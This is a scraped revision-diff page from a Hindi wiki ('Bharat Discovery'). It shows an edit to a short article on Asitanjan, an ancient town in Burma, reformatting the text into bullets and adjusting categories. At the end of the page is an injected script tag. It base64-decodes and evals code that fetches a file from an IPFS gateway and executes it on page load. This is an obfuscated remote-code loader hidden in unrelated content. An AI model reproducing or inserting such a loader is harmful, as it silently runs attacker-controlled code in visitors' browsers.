Difference between revisions of "असितांजन बर्मा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
{{पुनरीक्षण}}
 
 
{{बहुविकल्प|बहुविकल्पी शब्द=असितांजन |लेख का नाम=असितांजन (बहुविकल्पी)}}
 
{{बहुविकल्प|बहुविकल्पी शब्द=असितांजन |लेख का नाम=असितांजन (बहुविकल्पी)}}
असितांजन [[बर्मा]] ब्रह्मदेश का प्राचीन नगर है। असितांजन पर अति प्राचीन काल से मध्ययुग तक भारतीय औपनिवेशिकों का शासन रहा था। [[भारतीय संस्कृति]] का प्रसार भी इस प्रदेश में दूर-दूर तक हुआ। असितांजन बर्मा में प्राचीन भारतीयों का एक प्रमुख स्मारक है।  
+
*असितांजन [[बर्मा]] ब्रह्मदेश का प्राचीन नगर है।  
 +
*असितांजन पर अति प्राचीन काल से मध्ययुग तक भारतीय औपनिवेशिकों का शासन रहा था।  
 +
*[[भारतीय संस्कृति]] का प्रसार भी इस प्रदेश में दूर-दूर तक हुआ।  
 +
*असितांजन बर्मा में प्राचीन भारतीयों का एक प्रमुख स्मारक है।  
  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
Line 11: Line 13:
 
{{विदेशी स्थान}}
 
{{विदेशी स्थान}}
 
[[Category:विदेशी स्थान]]
 
[[Category:विदेशी स्थान]]
 +
[[Category:ऐतिहासिक_स्थल]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
[[Category:नया पन्ना]]
+
 
 
__INDEX__
 
__INDEX__

Revision as of 10:33, 1 September 2011

chitr:Disamb2.jpg asitaanjan ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- asitaanjan (bahuvikalpi)
  • asitaanjan barma brahmadesh ka prachin nagar hai.
  • asitaanjan par ati prachin kal se madhyayug tak bharatiy aupaniveshikoan ka shasan raha tha.
  • bharatiy sanskriti ka prasar bhi is pradesh mean door-door tak hua.
  • asitaanjan barma mean prachin bharatiyoan ka ek pramukh smarak hai.


tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>